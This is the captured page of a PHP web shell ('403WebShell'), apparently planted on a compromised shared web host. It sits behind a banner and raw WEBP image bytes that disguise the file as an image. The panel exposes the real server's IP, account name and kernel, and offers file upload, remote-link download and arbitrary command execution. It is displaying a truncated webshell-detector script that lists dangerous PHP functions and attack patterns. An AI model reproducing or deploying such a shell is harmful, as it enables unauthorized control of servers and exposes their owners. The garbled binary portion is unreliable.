....................................../////.===Shadow-Here===./////................................................
> < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > <
-------------------------------------------------------------------------------------------------------------------
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
RIFF¤  WEBPVP8 ˜  ðÑ 
*ô
ô
>‘HŸK¥¤"§£±¨àð	enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€<u¥QlÀ:Ò¨¶`iT[0 Ž´ª-˜ÇZU lÀ:Ò¨¶`iT[/úÏ{âŠUÌ
ã­*‹f ÌA~âcë¯)©‚Û–i‰u5 KÀ´}
.ä5
·å{ÒŸ1ª©Ú æiT[0 Ž–¶Œ—ÆY;cÿ‡·;zT)/Ô[ӟď•aÃÿ»æª“FçDO2hIoÞƒSõj¦K¼ŠL7ŸÛ›aÆxÜk[QJ¢Ù€<h‚GÖ“ùõ„7-Rš$HÆ#Aa,¤¾@8r©’Ïȉ‰ÍÁ’ òönxZÅe£íì6¢$f`iT[/4›ÑÞ±]¼Šöébû¸x“4á¦‰§SDñÍÁ
{U)ìs
ß
…
Î;ãfRü 7ººgëàØX3T™ ¨´ö óG*ÿÔ.ÆuÑh}­
O®ÉwÔÂã7‘ÀÉnyñã­*‹eéã*z*ï/q¹ºõ(3+ªA!}µFÝ­%óÙ½Úcñ¶¢•E²ðÕ$ö5^ÁœÇ-ï™Ï/ÂñÜ·¯Cõ£¿0unW$"»‘”§û•ÔÈhR…$Ý©-ËJ¢Ù€3(¯¾*îÙr=þÜÉMÜ$¢‡ 

}?É{\žõAÖÁÓl2Ä7yæ
*¾U U¼`;…¥ò< ~=b
1wÃÚÅHeÅÙ¼v²D(*-˜ÇYÓ±Pèqë?Ö$ ’*‚
Ìáý«%£Fè3Ù{þBá¡_ùûä[« Tyy;õn~¶{üB⶷‹>SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿	/ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g
gÆv›Øuh~
a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô
^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['
½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>čÍ¥ˆuߤ#ˆ$6ù™¥îŠ‡y’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ
¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×Uñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒwŽ¼GÔ´zàÒò
ð*ëzƒ•4~H]Ø‹f ñÓ
Èñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J
ù…î
èo£ßP
Îñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~©¹rÓê‚j¶d¸{^Q'˜±Crß	ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€<h†×[7…ó\âüvn¹k­³¸ÃûR
ÜPVe4­qYÊ_f ñÖ•EµP–µv Ä•Ûë®2Xß[…”+@óż€?ë2S˜s^áþÎñ¶¢•EKÇ̉FVÔ«:°+¹snŸ]@A¢ÈøÈ€ÛVV‡ÿ¹³ØÅ«»õ·zkF3‘º
‹f ñÓ
í9t¿¨ZßÀ6íºÛˆ”nnù:U“¹o¡8*ž| Å_œÎ"Ù€<u‘.¹…µKã2)1¡˜Ï²RR1A
ËÏéS룡¦ì&̐T[/=LêãÓü+-Ù€(ä#
bCiœ8;OÍ€zÝÀY€<u¥M¤Öh?c©êðÔ2’Á8é
¼í-oþÚ¸ÓK¡aÔ
bº‡µI’
ŠfŽi½6½-{³ì@16‚ÜÚÿX¾¤/j)TZšÁ\ŒY‰1²õžA\Üm?èäc0I ¨¶_è  þüp“ÿzPXÜi¿ÿöÇ¿Ö=þ±ï       ]€  l7ùVù &9žå}+iW&þ“¶Eܮܐu‰lÍi¬ç}'qvÆ\Vûñ¶}Ä0£!.Ó¼ù™!1­t Ÿ±qBXÒ㬙‡±lÀÖ%tæÿOºú²¹¹K‘½w7q¾I#H_Åw\@—ÑÕ$!4ñu
—µY!„­´~ív“þzß„t°´ZÎ?áJÏÆo`=! ¶ßîþî|m(1êÜG'
ìøI‚_ìlÝ`
ÀàÈ#9~Ôº~Ö]+óܲâÑÝÃGÌ-ÃŽV/w¤úÞ§5³zÞ`BÍ-[o_ú‰ÃNÙø§º>IßÚù+–MGi‰*jE€‘JcÜ	ÓÌ
EÏÚj]o˜
Þr <¾U
ûŪæÍ/šÝH¥˜b”¼
ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh
–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI
%1À% ¹Ò –
”ϝS¦‰4&¶£°à Öý”û_ÒÁw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP
í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ßÕû˜þãÇ-PÍ.¾XV‘€
dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:<kY//€¯îZòúbl?ƒô)Nñîo‚8gÚ–Ž
ãí?m6˜!Anº»¶¡%Š°c"¯òèØS'"y2Ê/TKš{Íæ(ÀªSs[†'<¨ª³!‹ŽhgZ¥è@	MŸ( ¸º€iÏssóäÅ ¥$±’`;$Í ‡Û€æ2èä¦ÄWDxao¦D¡°!Qå·3åÏw)Áþ:¦žûéº«à”£Pç‚ËTr{’ï¸ö‰ûÌœ=:ìrÈÅ*ÖÖk :ýÿÚ=‡VäonßoÎÕÍ'Ÿ®ÆL{ae"=<$"¹7Àˆ.!å¿Wζ—|
áYŸÜ¸Ê*;šÎ&ÆÛ U‡¡Þ®³Û.-·2õÑÇ	JZ~G0ø³ N7¸ærÔ ‹áoÀ<ÇMqÜóëZ	pPu]×Æð3ä7àlÎBµAŸ¾Iµ‡È« >F±Ú”	.Ѽ+Áu&Ç`."pÈÉw
o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ'²Ð
öø_¨ÂÉ9u鶳Ò
ŠõTàîMØ#û¯gN‡bÙ놚X„ö
…ÉeüÌ^J
‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB
«Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•â•ªVêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd
#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•î¦ñ·­(VlŸ‘
nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?
ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z 
 H“C}”¬,Mp
ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð
!BÔǢĩš+Õì
D«7ìN
¶ŽðÔ	"
ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹ê
N[Ò3Œñbï8P	4ƒ×q¢bo|?<ÛX¬òÄÍ°L–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô
¾–ÄÏø ×e8Ë©$ÄF¹Å‹
ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™
Mÿþ(±“t@â“ö2­´TG5yé]çå僳	.·ÍïçÝ7UÚ±Ð/Nè»,_Ïùdj7\ï
Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È
÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ
0fãaN]òY³RV	™î$®K2R¨`W!1Ôó\;ÝýB%qæK•&ÓÈe9È0êI±žeŸß
-ú@žQr¦
ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí
;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{<j:ç•Xåz´”Ï‘zÙè)÷œ[B]é\¢ï™… Qäa!¶óïÍ\Ã
GèÓÀÿû£
*XÒû½ û Ô¥Xõž&¦Ý'¹Ð)§šËöe
ÖŒ­ÉôMÐhýx±¨]a´ŽD.9õa`¡µZËW"{ï¼dæ b4KDšüÁ»&bk¹“Æ ¼CŽ_çП(ôž-3̱aºöÄ÷’Ùܹ´fળ½˜Zó·U#œ-ñªÂ¡,)ïÀA…£D[¯	Ë«ý¨C[\”˜¢í•]Œ<t՗ׇ؊Ò>Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né
`ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€
05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î
v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6]
µÆ„Ooòü
²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6
¢}`ùH­–”¡k‰P1>š†®9z11!X	wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýc塶7ߊß
57^\wÒÐÆ k§h<Sïð¼Ê›Íbòþ·v-–Ãú8
UÁÄ	Æ=Fy
èŒjè~‡ì·‰¸Ý
ó‘{Yd°$nå©´€Ü‹óe¦‘Ug+Á,cç°”2¼Ù ­¢W”ÛT»v
ø ³KÂu¸„Äe5öÊ«2åp1õ[^ˆô‰*lðL}2ƶ,jqs[Ȭ
ß̬ąv‰«õ&%§/.Sly4
 ¶-Þáם²¦Xd½ƒ5¶GØÈ"Ö >,Œý
î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} 
³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtÃ	0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2	†üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼
ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð
äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“
wiÎ×7_… ¸
\#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀqªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒqÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ
(øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼„±ÍçèSaÓ
3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œï
J·±$§?º>ÖüœcNÌù¯G ‹ñ2ŠBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ	‰	p5?0ÊƃZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳	è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… …
$%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü
ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š
Â* ­íÄ9­< 	h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:!
Aõ.ç~ÓBûH÷JCÌ]õVƒd
«ú´QÙEA–¯¯Œ!.ˆˆëQ±ù
œ·Ì!Õâ	)ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù<j…}WSQª1¶¹\h‰&¸×°­”JÓÓ$à®ØÜ´«òBI„ûí½è‚ðhƒlý
ö•j‹)ÚZ]5[g$oD…'0¡kqIñVm2®žÜ‰‘k‹¦Ýz‰™gýŽ ·[eQ”°†3‘šc>+p{™ðè
û³”g±OƒÚSù£áÁÊ„ä,ï7š²G
ÕÌBk)~ÑiCµ|h#u¤¶îK¨²#²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O
µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4	zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñë<Reða%âɟ>äg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\
ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû
…‚g¶Úüâî*moGè¨7%u!]PhÏd™
Ý%Îx:
VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5	Œ%u5XkñÌ*N
U%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´	ÒÊ]y	žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü
.̘¯€šòü¤U~Ù
†*¢!?ò
wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯ B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3
uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1
ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_
µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo	§—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~
‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ
®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF
±Ê8
7HÖ
Ï“²Æ–m9…òŸï]Â1äN†VLâCˆU
.ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘
|¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð
E6-‡¼!ýpãÔM˜ Â
sìe¯ñµK¢Ç¡ùôléœ4Ö£”À 
Š®Ðc
^¨À}ÙËŸ§›ºê{ÊuÉC
×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò·àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£X
é¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@
NŠÀ(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 

<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>205.196.210.190</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.35</font><br>Web Server : <font color='#df5'>Apache</font><br>System : <font color='#df5'>Linux pdx1-shared-a2-06 6.6.116-grsec-jammy-dirty #1 SMP Sat Nov  8 00:02:42 UTC 2025 x86_64</font><br>User : <font color='#df5'>dh_2vi232&nbsp;</font>( <font color='#df5'>5939701</font>)<br>PHP Version : <font color='#df5'>8.2.29</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=green>ON</font> &nbsp;|&nbsp; Pkexec : <font color=green>ON</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/home">home</a>/<a href="?loknya=/home/dh_2vi232">dh_2vi232</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='green'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /home/dh_2vi232/webshell.php</tr></td></table><br/><pre>&lt;?php
/**
 * Webshell 检测工具（优化版）
 * 添加了超时控制、进度显示、并发扫描限制等功能
 */

class WebshellDetector {
    
    // 常见的Webshell特征关键词
    private $dangerous_functions = [
        &#039;eval(&#039;, &#039;assert(&#039;, &#039;system(&#039;, &#039;exec(&#039;, &#039;shell_exec(&#039;,
        &#039;passthru(&#039;, &#039;proc_open(&#039;, &#039;popen(&#039;, &#039;pcntl_exec(&#039;,
        &#039;file_put_contents(&#039;, &#039;fwrite(&#039;, &#039;fopen(&#039;,
        &#039;base64_decode(&#039;, &#039;gzuncompress(&#039;, &#039;gzdecode(&#039;,
        &#039;include_once(&#039;, &#039;require_once(&#039;,
        &#039;create_function(&#039;, &#039;preg_replace_callback(&#039;
    ];
    
    // 可疑的文件名特征
    private $suspicious_filenames = [
        &#039;shell&#039;, &#039;backdoor&#039;, &#039;cmd&#039;, &#039;c99&#039;, &#039;r57&#039;,
        &#039;wso&#039;, &#039;b374k&#039;, &#039;c100&#039;, &#039;webshell&#039;,
        &#039;phpinfo&#039;, &#039;config&#039;, &#039;test&#039;, &#039;admin&#039;,
        &#039;upload&#039;, &#039;filemanager&#039;, &#039;manager&#039;
    ];
    
    // 可疑的代码模式
    private $suspicious_patterns = [
        &#039;/eval\s*\(\s*base64_decode\s*\(/i&#039;,
        &#039;/eval\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/assert\s*\(\s*base64_decode\s*\(/i&#039;,
        &#039;/system\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/include\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/require\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/\$\w+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/@\$\w+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE)/i&#039;,
        &#039;/preg_replace\s*\(\s*[&quot;\&#039;]\/\.\*\/e[&quot;\&#039;]/i&#039;,
        &#039;/preg_replace\s*@.*\/e@i&#039;,
        &#039;/create_function\s*\(/i&#039;,
        &#039;/`.*`/&#039;, // 反引号执行命令
    ];
    
    // 配置选项
    private $config = [
        &#039;max_file_size&#039; =&gt; 5242880, // 最大文件大小 5MB
        &#039;max_scan_time&#039; =&gt; 300,     // 最大扫描时间 5分钟
        &#039;max_depth&#039; =&gt; 20,          // 最大递归深度
        &#039;timeout&#039; =&gt; 30,            // 每个文件的最大处理时间
        &#039;scan_extensions&#039; =&gt; [&#039;php&#039;, &#039;php3&#039;, &#039;php4&#039;, &#039;php5&#039;, &#039;php7&#039;, &#039;phtml&#039;, &#039;inc&#039;],
        &#039;exclude_dirs&#039; =&gt; [&#039;.git&#039;, &#039;.svn&#039;, &#039;vendor&#039;, &#039;node_modules&#039;, &#039;cache&#039;, &#039;logs&#039;],
        &#039;log_file&#039; =&gt; &#039;webshell_scan.log&#039;,
    ];
    
    // 扫描统计
    private $stats = [
        &#039;total_files&#039; =&gt; 0,
        &#039;scanned_files&#039; =&gt; 0,
        &#039;suspicious_files&#039; =&gt; 0,
        &#039;start_time&#039; =&gt; 0,
        &#039;end_time&#039; =&gt; 0,
    ];
    
    // 扫描结果
    private $results = [];
    
    /**
     * 构造函数
     * @param array $config 配置选项
     */
    public function __construct($config = []) {
        $this-&gt;config = array_merge($this-&gt;config, $config);
    }
    
    /**
     * 扫描指定目录
     * @param string $directory 要扫描的目录
     * @param bool $recursive 是否递归扫描子目录
     * @param int $depth 当前递归深度
     * @return array 检测结果
     */
    public function scanDirectory($directory, $recursive = true, $depth = 0) {
        // 检查扫描时间
        if ($this-&gt;checkTimeout()) {
            throw new Exception(&quot;扫描超时，已运行 &quot; . (time() - $this-&gt;stats[&#039;start_time&#039;]) . &quot; 秒&quot;);
        }
        
        // 检查递归深度
        if ($depth &gt; $this-&gt;config[&#039;max_depth&#039;]) {
            $this-&gt;log(&quot;达到最大递归深度: {$directory}&quot;);
            return $this-&gt;results;
        }
        
        if (!is_dir($directory) || !is_readable($directory)) {
            $this-&gt;log(&quot;目录不存在或不可读: {$directory}&quot;);
            return $this-&gt;results;
        }
        
        try {
            $iterator = new RecursiveDirectoryIterator(
                $directory, 
                RecursiveDirectoryIterator::SKIP_DOTS
            );
            
            foreach ($iterator as $file) {
                // 检查扫描时间
                if ($this-&gt;checkTimeout()) {
                    throw new Exception(&quot;扫描超时，已运行 &quot; . (time() - $this-&gt;stats[&#039;start_time&#039;]) . &quot; 秒&quot;);
                }
                
                $filepath = $file-&gt;getPathname();
                $filename = $file-&gt;getFilename();
                
                // 跳过排除的目录
                if (in_array($filename, $this-&gt;config[&#039;exclude_dirs&#039;])) {
                    continue;
                }
                
                // 如果是目录且需要递归扫描
                if ($file-&gt;isDir() &amp;&amp; $recursive) {
                    $this-&gt;scanDirectory($filepath, $recursive, $depth + 1);
                }
                
                // 检查文件
                if ($file-&gt;isFile()) {
                    $this-&gt;stats[&#039;total_files&#039;]++;
                    
                    if ($this-&gt;isPhpFile($filepath)) {
                        $result = $this-&gt;scanFile($filepath);
                        
                        if (!empty($result[&#039;suspicious&#039;])) {
                            $this-&gt;results[$filepath] = $result;
                        }
                        
                        $this-&gt;stats[&#039;scanned_files&#039;]++;
                        
                        // 每扫描100个文件输出一次进度
                        if ($this-&gt;stats[&#039;scanned_files&#039;] % 100 === 0) {
                            $this-&gt;log(&quot;已扫描 {$this-&gt;stats[&#039;scanned_files&#039;]} 个文件...&quot;);
                        }
                    }
                }
            }
        } catch (Exception $e) {
            $this-&gt;log(&quot;扫描目录时出错: &quot; . $e-&gt;getMessage());
        }
        
        return $this-&gt;results;
    }
    
    /**
     * 扫描单个文件
     * @param string $filepath 文件路径
     * @return array 检测结果
     */
    public function scanFile($filepath) {
        $result = [
            &#039;filepath&#039; =&gt; $filepath,
            &#039;filename&#039; =&gt; basename($filepath),
            &#039;size&#039; =&gt; filesize($filepath),
            &#039;mtime&#039; =&gt; filemtime($filepath),
            &#039;filename_suspicious&#039; =&gt; false,
            &#039;dangerous_functions&#039; =&gt; [],
            &#039;suspicious_patterns&#039; =&gt; [],
            &#039;suspicious&#039; =&gt; false,
            &#039;risk_level&#039; =&gt; 0, // 风险等级 0-10
        ];
        
        // 检查文件大小
        if ($result[&#039;size&#039;] &gt; $this-&gt;config[&#039;max_file_size&#039;]) {
            $result[&#039;warning&#039;] = &quot;文件过大，跳过详细扫描&quot;;
            return $result;
        }
        
        // 检查文件名是否可疑
